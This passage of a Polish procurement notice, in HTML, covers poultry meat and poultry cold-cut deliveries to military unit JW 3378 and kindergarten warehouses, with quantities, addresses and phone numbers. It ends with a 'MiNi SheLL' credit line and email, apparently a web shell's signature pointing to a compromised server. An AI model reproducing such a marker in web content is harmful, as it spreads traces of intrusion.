ul. Osiedle XXX-lecia LLP 78-651 Mirosławiec
Telefon do magazynu przedszkola : 2505702
Mirosławiec- Nadarzyce
Noga z kurczaka mrożona kg 500
Noga z kurczaka kg 430
Filet z piersi kurczaka kg 480
Filet z piersi indyka kg 400
Wątroba z kurczaka kg 400
Żołądki kurczaka kg 400
Mirosławiec-Przedszkole
Noga z kurczaka kg 70
Filet z piersi kurczaka kg 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE V - WĘDLINY Z MIĘSA DROBIOWEGO - Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378
Drawsko Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1
78-513 Oleszno
Telefon do magazynu żywnościowego : 947474087
Telefon do kancelarii żywnościowej: 947474217
1. Parówki drobiowe kg 1 500
2. Szynka drobiowa kg 1 500
3. Szynka z indyka kg 1 500
4. Mortadela drobiowa kg 1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE VI - WĘDLINY Z MIĘSA DROBIOWEGO -Złocieniec, Złocieniec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378
Drawsko Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW. 3378 przy JW 1696
Ul. Czwartaków 4
78-524 Złocieniec
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 943637540
Magazyn żywnościowy Przedszkola
ul. Pancerniaków 5 78-524 Złocieniec
Telefon do magazynu przedszkola : 943637389
Złocieniec
1. Parówki drobiowe kg 300
2. Szynka drobiowa kg 290
3. Szynka z indyka kg 180
4. Mortadela drobiowa kg 100
Złocieniec-Przedszkole
1. Parówki drobiowe kg 0
2. Szynka drobiowa kg 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE VII - WĘDLINY Z MIĘSA DROBIOWEGO - Wałcz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378
Drawsko Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24
78-600 Wałcz
Telefon do magazynu żywnościowego : 672502085
Telefon do kancelarii żywnościowej: 672502080
1. Parówki drobiowe kg 250
2. Szynka drobiowa kg 250
3. Szynka z indyka kg 250
4. Mortadela drobiowa kg 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE VIII - WĘDLINY Z MIĘSA DROBIOWEGO - Mirosławiec- Nadarzyce, Mirosławiec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa wędlin z mięsa drobiowego realizowana do Jednostki Wojskowej 3378
Drawsko Pomorskie
Miejsce dostaw:
Magazyn żywnościowy JW. 3378 przy JW. 3299
78-651 Mirosławiec Górny
Telefon do kancelarii żywnościowej: 672505788
Magazyn żywnościowy Przedszkola
ul. Osiedle XXX-lecia LLP 78-651 Mirosławiec
Telefon do magazynu przedszkola : 2505702
Mirosławiec- Nadarzyce
Parówki drobiowe kg 270
Szynka drobiowa kg 270
Szynka z indyka kg 270
Mortadela drobiowa kg 270
Mirosławiec-Przedszkole
Parówki drobiowe kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com